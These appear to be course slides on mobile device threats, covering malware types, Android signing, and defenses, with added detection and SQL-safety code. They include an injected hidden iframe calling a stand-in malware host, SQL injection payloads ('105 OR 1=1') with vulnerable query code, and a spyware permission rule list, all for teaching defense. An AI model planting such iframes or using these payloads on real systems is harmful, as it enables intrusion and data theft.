Threats to Mobile Devices

Possible attack threats to mobile devices · ksuweb.kennesaw.edu/~she4/2017Fall/cs4322/Slides... · •Spyware – steals user information with user’s consent somehow. •Trojan horse




Possible attack threats to mobile devices

• Network exploit

  • Attackers take advantage of a vulnerability or flaw in the web browser on the user’s mobile device, reached over the Wi-Fi connection, to attack victims.

  • Attackers serve malicious code/data from a malicious website to the victim’s browser once the user opens the malicious page; the malicious code then takes control of the browser and harvests sensitive data on the victim’s device.

• Social engineering

  • Attackers use hyped content to attract, manipulate, or persuade people into revealing confidential information through deception such as phishing, for the purpose of information gathering, fraud, or obtaining access rights.


• Malware

  • Viruses hosted in legitimate code, self-replicating worms, and Trojan horses that carry out a deliberate malicious action

• Misuse of available resources and services

  • Email/SMS spam or denial of service (a group of attacking devices sends a large volume of data to one target on the Internet to degrade the target’s services)

• Enterprise/private data loss

  • Workplace data on a mobile device may be uploaded to a home PC while synchronizing or downloading entertainment; enterprise/private data may also be lost when the device is stolen

• Data tampering

  • Intentionally modifying or corrupting device data, such as the device’s contact list, without permission


Good practices that protect a mobile device from potential threats

• Protect against data loss due to device loss: record the device ID and remotely delete all apps, contacts, and confidential data as soon as the phone is stolen or lost

• Type URLs instead of copying and pasting or clicking links, to protect the phone from drive-by download attacks

• Protect data privacy with encryption, and don’t cache sensitive data

• Disable device features such as Wi-Fi, Bluetooth, and infrared when they aren’t in use; enable the firewall and disable sharing


Good practices that protect a mobile device from potential threats (continued)

• Isolate personal apps from corporate apps

• Detect and remove malware apps

• Download mobile apps only from trusted sources and application providers, and check the permission requests during installation

• Install a mobile security application to protect the device from attacks


Mobile device security protection strategies

1. Block an app’s attempt to act beyond its granted permissions.

• Access control: identify the caller (app ID) and require a permission for each resource access

• App signature: each app is signed with the identity of its author, which protects the app from tampering.

• Encryption: encoding stored data so that it remains protected in case of device loss or theft.

• Isolation: restrict every app from accessing sensitive data that is not its own. Each Android app runs in its own process, under its own Linux user ID, and cannot access resources belonging to another app unless a specific permission has been granted.


Android’s Security

• Android’s security is supported by encryption, signatures, isolation, and access control. However, there are still vulnerabilities in Android mobile devices.

• The Android app signature system ensures that the app’s code is not tampered with and lets the platform recognize the identity of the app’s author. Although Android will only install and run a signed app, no certificate issued by a certificate authority or by Google is required: developers sign with self-signed certificates. Attackers can therefore sign their malware with anonymous self-signed certificates and distribute it without any vetting by Google, whereas Apple requires a developer certificate issued by Apple.

• An attacker can create and distribute a malicious app, since people will not be able to trace it back to its source, or add Trojan horses and malicious code to an existing legitimate app, re-sign the modified version with an anonymous or fake certificate, and distribute it. The original digital signature is broken and lost, so the repackaged app no longer matches the original author’s signing key. Android does compare signing keys on update: an update signed with a different key than the installed app is refused, so a repackaged copy cannot silently replace the genuine app already on a device; it has to be installed as a separate package or on a device where the original is absent.


Mobile Malware Security Solutions

• Popular mobile malware (malicious software) includes:

  • Spyware – steals user information, often after obtaining some form of user consent by deception.

  • Trojan horse – steals confidential information such as credit card numbers.

  • Adware – displays unwanted pop-up ads, with or without theft of sensitive data.

• Some malware simply degrades or disrupts device operation, for example by rebooting the device or exhausting its battery, with no financial motive.

• Because of the small screen size of mobile devices, most apps don’t show the URL on screen while accessing the web, which makes it even more difficult for the user to monitor and determine where an app is connecting.


Spyware and Adware

• Spyware secretly gathers confidential information about the mobile user and relays it to a third party. These may be advertisers or marketing data firms, which is why spyware is sometimes lumped together with “adware” (short for advertising-supported software) that automatically delivers advertisements such as pop-up ads.

• It is typically installed without user consent, by disguising itself as a legitimate app (say, a simple game) or by injecting its payload into a legitimate app.

• Spyware uses the victim’s mobile connection to relay personal information such as contacts, location, messaging habits, browser history, and user preferences or downloads.

• Spyware also gathers device information such as OS version, product ID, International Mobile Equipment Identity (IMEI) number, and International Mobile Subscriber Identity (IMSI) number.


Trojans

• A mobile Trojan is a program disguised as something normal or desirable; it infects user devices by attaching itself to a seemingly harmless or legitimate program, is installed along with that app, and then carries out malicious actions.

• Such programs have been known to hijack the browser, cause the device to send unauthorized premium-rate texts, or capture login information from other apps such as mobile banking.

• Trojans are closely related to mobile viruses, which can be installed on the device in any number of ways and cause effects that range from merely annoying to highly destructive and irreparable.

• Malicious parties can potentially use mobile viruses to root the device and gain access to files and flash memory.


Phishing Apps

• Mobile browsing of the Internet is growing with smartphone and tablet penetration. Just as with desktop computing, fraudsters create mobile phishing sites that look like a legitimate service but steal user credentials or worse.

• The smaller screen of mobile devices makes phishing techniques easier to hide from users, who tend to be less careful on mobile devices than on PCs.

• Some phishing schemes use rogue mobile apps, programs that can be considered “trojanized”, which disguise their true intent as a system update, marketing offer, or game.

• Others infect legitimate apps with malicious code that the user discovers only after installing.


Ransomware

• Ransomware is a form of malware that essentially holds a computer system captive while demanding a ransom.

• The malware restricts user access to the device, either by encrypting files on its storage or by locking the system and displaying messages intended to force the user to pay the malware creator to remove the restrictions and regain access.

• Ransomware typically spreads like an ordinary computer worm (see below), arriving on a device via a downloaded file or through a vulnerability in a network service.


Rootkit

• A rootkit is a type of malicious software designed to remotely access or control a device without being detected by users or security programs.

• Once a rootkit has been installed it is possible for the malicious party behind the rootkit to remotely

• Rootkit prevention, detection, and removal can be difficult because of their stealthy operation. Because a rootkit continually hides its presence, typical security products are not effective at detecting and removing it.

• As a result, rootkit detection relies on methods such as monitoring device behavior for irregular activity, signature scanning, and storage or memory dump analysis.

• Organizations and users can protect themselves from rootkits by regularly patching vulnerabilities in software, applications, and operating systems, updating virus definitions, avoiding suspicious downloads, and performing static analysis scans.


Bot Processes

• Mobile malware is getting more sophisticated, with programs that operate in the background on the user’s device, concealing themselves and lying in wait for certain behaviors, such as an online banking session, before striking.

• Hidden processes can execute completely invisibly to the user, run executables, or contact bot-masters for new instructions.

• The next wave is expected to be even more advanced, with botnet tendencies to actually hijack and control infected devices.


Mobile Malware Symptoms

• While these types of mobile malware differ greatly in how they spread and infect devices, they can all produce similar symptoms.

• Signs of a malware infection can include unwanted behaviors and degraded device performance. Stability issues such as frozen apps, failure to reboot, and difficulty connecting to the network are also common.

• Mobile malware can eat up battery or processing power, hijack the browser, send unauthorized SMS messages, or freeze or brick the device entirely.


Common types of malware delivery mechanisms

• Drive-by malware (silent malware)

Drive-by malware delivers (downloads) itself onto a user’s device without consent or user interaction by exploiting vulnerabilities in the user’s browser via an invisible element such as an HTML iframe tag or an HTML embed element for an image file. The attacker either tempts the victim into visiting an infected website or sends malware-infected messages (SMS) that link to one.

• Software updates

Malware invites users to “update” software (which turns out to be malicious) on social networks or web sites.


Common types of malware delivery mechanisms (continued)

• Pop-up ads

Adware lures users into clicking an ad that directs them to download/install malicious code, such as a Trojan horse embedded in a Word or PDF file. The download may also be a keylogger, which monitors mouse operations or keystrokes to steal personal data.

• Man-in-the-middle (MITM)

An attacker may hijack a session by eavesdropping: the attacker makes independent connections with the victims and relays messages between the two parties so that both believe they are talking directly to each other. The MITM attacker intercepts the whole conversation and inject

• Botnet

One attacker controls a group of sites (devices) and directs them to send a large volume of traffic to a victim, resulting in a denial-of-service (DoS) attack. Afterwards, the attacker demands payment from the victim to stop the attack.


Malware detection and protection solutions

• Filtering with blacklisting and whitelisting

Many search engines place malicious websites on a blocked list (“blacklist”) and warn potential visitors who try to access a site on the list. An enterprise or an individual can also set up their own blacklist. A whitelist filter, if the whitelist is exclusive, allows access only to the sites on the list. These filtering techniques are also widely used for spam email filtering.

• View page source code

Use Page Source (Firefox) or View Source (Internet Explorer) to view the actual source code of a page and find injected malicious code.
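The blacklist/whitelist filtering described above, as an added example that is not part of the original slides: a host-based URL filter that applies a blacklist and, optionally, an exclusive whitelist. The two lists and the sample URLs are constructed for this example; the only host taken from the slides is www.badwebsite.com.

```python
# Added example, not from the slides: a host-based URL filter that applies a
# blacklist and, optionally, an exclusive whitelist. Both lists are constructed.
from urllib.parse import urlsplit

BLACKLIST = {"badwebsite.com", "malware-cdn.example"}
WHITELIST = {"intranet.example.org", "bank.example"}


def _hostname(url):
    """Lower-cased hostname of url, or None for URLs without one (javascript:, data:)."""
    host = urlsplit(url).hostname
    return host.rstrip(".") if host else None


def _listed(host, domains):
    """True if host is one of the listed domains or a subdomain of one.

    Matching on the dotted boundary stops 'notbadwebsite.com' and
    'badwebsite.com.evil.example' from being treated as 'badwebsite.com'.
    """
    return any(host == d or host.endswith("." + d) for d in domains)


def url_allowed(url, blacklist=BLACKLIST, whitelist=WHITELIST, exclusive=False):
    """Decide whether url may be fetched.

    exclusive=False: block blacklisted hosts, allow everything else.
    exclusive=True:  block blacklisted hosts, allow only whitelisted hosts.
    """
    host = _hostname(url)
    if host is None:
        return False                      # nothing to judge: fail closed
    if _listed(host, blacklist):
        return False                      # the blacklist always wins
    if exclusive:
        return _listed(host, whitelist)
    return True


if __name__ == "__main__":
    for u in ("http://www.badwebsite.com/inject/page_walware.html",
              "https://news.example/story",
              "https://www.bank.example/login"):
        print(u, "->", "allow" if url_allowed(u, exclusive=True) else "block")
```

The suffix match on a dot boundary is the part worth copying: a plain substring test would either let `badwebsite.com.evil.example` through or block unrelated hosts such as `notbadwebsite.com`. URLs with no hostname (`javascript:`, `data:`) are refused outright, since a filter that cannot classify a target should fail closed.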


Spyware detection techniques

a. Static analysis

Static analysis is a reverse-engineering approach to finding malicious code segments and characteristics in an app without executing it. The analysis focuses on known security threats that have been reported before. One lab in this module covers the static analysis approach to detecting spyware.

b. Dynamic analysis

Dynamic analysis executes the suspicious mobile app in an isolated sandbox, such as a virtual machine or emulator, to monitor and inspect the app’s run-time behavior.

c. App permission analysis

Android security uses permissions to protect resources, and the permissions an app requests reveal its intentions. Permissions must be declared explicitly by the app’s author in the app’s manifest. Many spyware apps abuse the permissions they are granted, so a combination of requested permissions that gives an app both access to personal data and a channel to send it out is a warning sign.
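The permission analysis described in item c, as an added example that is not part of the original slides: a static check that reads the `<uses-permission>` entries of an AndroidManifest.xml and flags combinations that pair a source of personal data with a way to exfiltrate it. The manifest (a “simple game” asking for far more than a game needs) and the rule table are constructed for this example; the permission names are real Android permissions, but the rules are a hypothetical, deliberately small risk model.

```python
# Added example, not from the slides: a static check of the permissions an
# app requests in its AndroidManifest.xml, flagging combinations that give an
# app both a source of personal data and a channel to send it out.
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Hypothetical risk rules for this example: (finding, permissions that must
# all be present). A real detector weighs many more signals than this.
SPYWARE_RULES = [
    ("reads contacts and can send them out",
     {"android.permission.READ_CONTACTS", "android.permission.INTERNET"}),
    ("reads SMS and can send them out",
     {"android.permission.READ_SMS", "android.permission.INTERNET"}),
    ("tracks precise location and can send it out",
     {"android.permission.ACCESS_FINE_LOCATION", "android.permission.INTERNET"}),
    ("records audio and can send it out",
     {"android.permission.RECORD_AUDIO", "android.permission.INTERNET"}),
    ("can send SMS (premium-rate fraud risk)",
     {"android.permission.SEND_SMS"}),
    ("reads device identifiers such as IMEI/IMSI",
     {"android.permission.READ_PHONE_STATE"}),
]

# Constructed manifest of a "simple game" that asks for far more than a game needs.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.simplegame">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <application android:label="Simple Game"/>
</manifest>
"""


def requested_permissions(manifest_xml):
    """Return the set of permission names declared with <uses-permission>."""
    root = ET.fromstring(manifest_xml)
    name_attr = "{%s}name" % ANDROID_NS      # attributes live in the android: namespace
    return {
        elem.get(name_attr)
        for elem in root.iter("uses-permission")
        if elem.get(name_attr)
    }


def analyze_permissions(manifest_xml, rules=SPYWARE_RULES):
    """Return (requested permissions, findings whose rule set is fully present)."""
    perms = requested_permissions(manifest_xml)
    findings = [finding for finding, needed in rules if needed <= perms]
    return perms, findings


if __name__ == "__main__":
    perms, findings = analyze_permissions(SAMPLE_MANIFEST)
    print("requested:", ", ".join(sorted(perms)))
    for finding in findings:
        print("FLAG:", finding)
```

The check is a heuristic, not a verdict: a messaging app legitimately needs READ_CONTACTS and INTERNET. What makes the sample suspicious is the mismatch between what the app claims to be and what it asks for, which is exactly the comparison a reviewer should make when checking permission requests at install time.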


Malware injection

Malware injection is the act of inserting malicious code into a vulnerable web server page with poor application input filtering, so that users’ devices get infected with malware when they interact with the page through a form or other GUI component. Such injection can be reduced by a filter deployed on the web server that rejects invalid input such as SQL injection commands.

Malware injection works as follows:

1. Inject a vulnerable website with malicious code that web browsers will request

HTML:

<iframe src="http://www.badwebsite.com/inject/page_walware.html"
        width="1" height="1" style="visibility: hidden">
</iframe>


2. Exploit and take control of the infected web browser with the injected code, directing the exploited browser to download malware to the user’s device

Once the user browses the injected web page, the malicious content from the hop point (a website controlled by the attacker) executes inside the requested (and presumed legitimate) web page. The malware injection process served from “http://www.badwebsite.com/inject/page_walware.html” is loaded through the iframe into the browser, which installs a specific set of instructions for the browser to connect to a malicious site and download malware such as remote control utilities and backdoors, as well as programs that automatically crawl storage in search of information such as credit card details or bank accounts.

3. Finally, the downloaded malware runs silently on the victim’s device


Safeguards

• Log on as a non-admin user

• Secure your browser

  Set browser security to high to reject unwanted JavaScript.

  Use Firefox with NoScript to run scripts only from sites on a whitelist.

• Examine the application code and web server for evidence of:

  injected iframes, JavaScript, SQL injection, and embedded objects such as Flash and PDF
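The last safeguard, examining page source for injected iframes and scripts, as an added example that is not part of the original slides. It also covers the drive-by delivery mechanism (invisible iframe/embed elements) and the three-step malware injection walk-through above: the scanner reads a page’s HTML, flags `iframe`, `embed` and `object` elements that are 0/1 px or CSS-hidden, and flags any watched element whose `src` points at a host outside the site’s expected set. The sample page and the trusted-host list are constructed for this example; the injected iframe is the one shown in the slides.

```python
# Added example, not from the slides: a scanner for the hidden-iframe / foreign
# script injection the slides describe, run over a page's HTML source. The
# sample page and the trusted-host list are constructed for this example.
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts the page at www.example.org is expected to load content from (constructed).
TRUSTED_HOSTS = {"www.example.org", "player.example.org", "cdn.example.org"}

SAMPLE_PAGE = """<html><body>
<h1>Welcome to our site</h1>
<iframe src="https://player.example.org/embed/123" width="560" height="315"></iframe>
<iframe src="http://www.badwebsite.com/inject/page_walware.html" width="1" height="1" style="visibility: hidden"></iframe>
<script src="https://cdn.example.org/app.js"></script>
<script src="http://www.badwebsite.com/x.js"></script>
<embed src="http://www.badwebsite.com/logo.gif" width="0" height="0">
</body></html>"""


def _is_hidden(attrs):
    """Tiny (0/1 px) or CSS-hidden elements are the classic drive-by carrier."""
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = all(attrs.get(k, "").strip() in ("0", "1") for k in ("width", "height"))
    return tiny or "visibility:hidden" in style or "display:none" in style


class InjectionScanner(HTMLParser):
    WATCHED = ("iframe", "script", "embed", "object")

    def __init__(self, trusted_hosts):
        super().__init__()
        self.trusted = trusted_hosts
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in self.WATCHED:
            return
        a = {k: (v or "") for k, v in attrs}            # valueless attrs become ""
        src = a.get("src") or a.get("data")             # <object data=...>
        host = urlsplit(src).hostname if src else None  # None: inline or same-origin
        reasons = []
        if tag != "script" and _is_hidden(a):
            reasons.append("hidden " + tag)
        if host and host not in self.trusted:
            reasons.append("loads %s from untrusted host %s" % (tag, host))
        if reasons:
            line, _ = self.getpos()                     # line in the page source
            self.findings.append({"line": line, "tag": tag, "src": src, "reasons": reasons})


def scan_html(html, trusted_hosts=TRUSTED_HOSTS):
    """Return suspicious elements, each with its source line and the reasons."""
    scanner = InjectionScanner(trusted_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE):
        print("line %d <%s src=%r>: %s"
              % (f["line"], f["tag"], f["src"], "; ".join(f["reasons"])))
```

Run over the sample page this reports the 1x1 hidden iframe, the script loaded from www.badwebsite.com and the 0x0 embed, with their line numbers, while leaving the legitimate player and CDN references alone. The line number is what makes the “view page source” step practical on a large page; a trusted-host list per site is what turns the check from “any iframe” into “an iframe this page should not have”.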


SQL Injection

• SQL injection is a code insertion technique used to attack data-driven applications, in which malicious input is inserted into a normal SQL statement to dump the contents of the database.

• Example:

txtUserId = getRequestString("UserId");

txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;


SQL Injection Based on 1=1 is Always True

• If there is nothing to prevent a user from entering "wrong" input, the user can enter some "smart" input like this:

  UserId: 105 OR 1=1

• Then the SQL statement will look like this:

  SELECT * FROM Users WHERE UserId = 105 OR 1=1;

• The SQL above is valid and will return ALL rows from the "Users" table, since OR 1=1 is always TRUE.


Another Example

uName = getRequestString("username");

uPass = getRequestString("userpassword");

sql = 'SELECT * FROM Users WHERE Name ="' + uName + '" AND Pass ="' + uPass + '"'

• A hacker might get access to user names and passwords in a database by simply inserting " OR ""=" into the user name or password text box:

  User Name: " or ""="

  Password: " or ""="

• The code at the server will create a valid SQL statement like this:

  SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""

• The SQL above is valid and will return all rows from the "Users" table, since OR ""="" is always TRUE.


SQL Injection Defense

• Validate input before it is used to build a SQL statement

• Parameterized statements: use placeholders for parameters whose values are supplied at execution time, so that input is never parsed as SQL

• Apply least-privilege database permissions to the account the application uses
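The three SQL injection slides above (the string-built query, the `1=1` and `""=""` payloads, and the defenses), as one added example that is not part of the original slides. It runs the slides’ query shapes against an in-memory SQLite table constructed here, next to a validated and parameterized version. Two assumptions: `make_db()` and the three users are invented, and the login query uses single quotes for the string literals (standard SQL; SQLite treats double-quoted text as identifiers), so the payload is `' or ''='` instead of the slides’ `" or ""="`. The injection works the same way.

```python
# Added example, not from the slides: the slides' string-built queries and their
# parameterized replacements, run against an in-memory SQLite table constructed
# here. Single quotes are used for the string literals because that is standard
# SQL (SQLite treats double-quoted text as identifiers); the injection works the
# same way as the slides' double-quote version.
import sqlite3


def make_db():
    """Constructed sample table with three users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserId INTEGER, Name TEXT, Pass TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)",
                     [(105, "alice", "s3cret"), (106, "bob", "hunter2"), (107, "carol", "pw")])
    return conn


# --- vulnerable: request data is pasted into the SQL text --------------------

def vulnerable_lookup(conn, txt_user_id):
    # Same shape as the slides: "SELECT * FROM Users WHERE UserId = " + txtUserId
    sql = "SELECT * FROM Users WHERE UserId = " + txt_user_id
    return conn.execute(sql).fetchall()


def vulnerable_login(conn, u_name, u_pass):
    # Same shape as the slides' second example; the input closes the quote early
    sql = ("SELECT * FROM Users WHERE Name ='" + u_name
           + "' AND Pass ='" + u_pass + "'")
    return conn.execute(sql).fetchall()


# --- defended: validate, then bind parameters --------------------------------

def validate_user_id(txt_user_id):
    """Input validation: a user id must be an integer; anything else is rejected."""
    return int(txt_user_id)          # raises ValueError on "105 OR 1=1"


def safe_lookup(conn, user_id):
    # '?' is a placeholder: the value is bound at execution time, never parsed as SQL
    return conn.execute("SELECT * FROM Users WHERE UserId = ?", (user_id,)).fetchall()


def safe_login(conn, u_name, u_pass):
    return conn.execute("SELECT * FROM Users WHERE Name = ? AND Pass = ?",
                        (u_name, u_pass)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    payload = "' or ''='"
    print("vulnerable_lookup('105 OR 1=1')    ->", len(vulnerable_lookup(conn, "105 OR 1=1")), "rows")
    print("safe_lookup('105 OR 1=1')          ->", len(safe_lookup(conn, "105 OR 1=1")), "rows")
    print("vulnerable_login(payload, payload) ->", len(vulnerable_login(conn, payload, payload)), "rows")
    print("safe_login(payload, payload)       ->", len(safe_login(conn, payload, payload)), "rows")
```

The string-built lookup returns every row for `105 OR 1=1` and the string-built login returns every row for the quote-closing payload, exactly as the slides describe. With a bound parameter the same text is compared as a value: `105 OR 1=1` matches no UserId and `' or ''='` matches no Name, so both return nothing, and `validate_user_id` rejects the lookup payload before any query is built. The third defense, a least-privilege database account, is not shown here; it limits what an injection can reach if the first two fail.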


Mobile device loss/theft

• Today a smart mobile device is not just for calling or sending messages; it has become a business and entertainment tool.

• We store large amounts of personal data, and even more sensitive company data, on mobile devices. That data may be exposed: email exchanges could be read; m-commerce data such as online purchases or banking transactions might be viewed; if the phone connects via a VPN, company networks could be exposed to malware or attacked.

• Phones may be lost anywhere and at any time.

• Nearly all who found a lost phone tried to access the information on it.


• The loss of mobile devices has become a real concern. About two-thirds of mobile device users feared not being able to recover lost content.

• It is one of the major security concerns for Android mobile devices. Some security experts have pointed out that targeting smartphones could potentially be more profitable for criminals than aiming at computers.


Action on Your Stolen Mobile Phone

• Avoid data loss

  Restore all important data quickly from a preinstalled auto-backup app (e.g., WaveSecure, MyBackup)

  Install a mobile tracking app to protect the device (Android Lost, Where’s My Droid)

• Salvage actions

  Report the loss/theft to your organization and/or mobile service provider immediately to deter malicious use of your device and minimize fraudulent charges.

  Change account credentials. If the device was used to access remote resources such as corporate networks or social networking sites, contact your enterprise or organization to revoke all credentials stored on the lost device and all certificates issued to it, or change your passwords.

  Locking the smartphone is the first line of defense for preventing thieves from stealing service (such as running up SMS fees), reading your email, or abusing VPN connections.


A mobile tracking app locates, locks and wipes.

• Locate: find your lost device and display its location on a Google map. Register your Android device with one of the many available “find me” services to locate and recover lost devices.

• Lock: remotely lock your lost device so that nobody can use your phone without your credentials, even if somebody swaps the SIM card. Use lock apps such as Norton Mobile or AppProtector, or a PIN/password, to lock your Android device. You can also enroll in a remote find/lock service.

• Wipe: remotely wipe important data stored on the device. Some mobile service providers offer remote full and selective wiping, which allows you or your provider to remotely delete all data on the phone.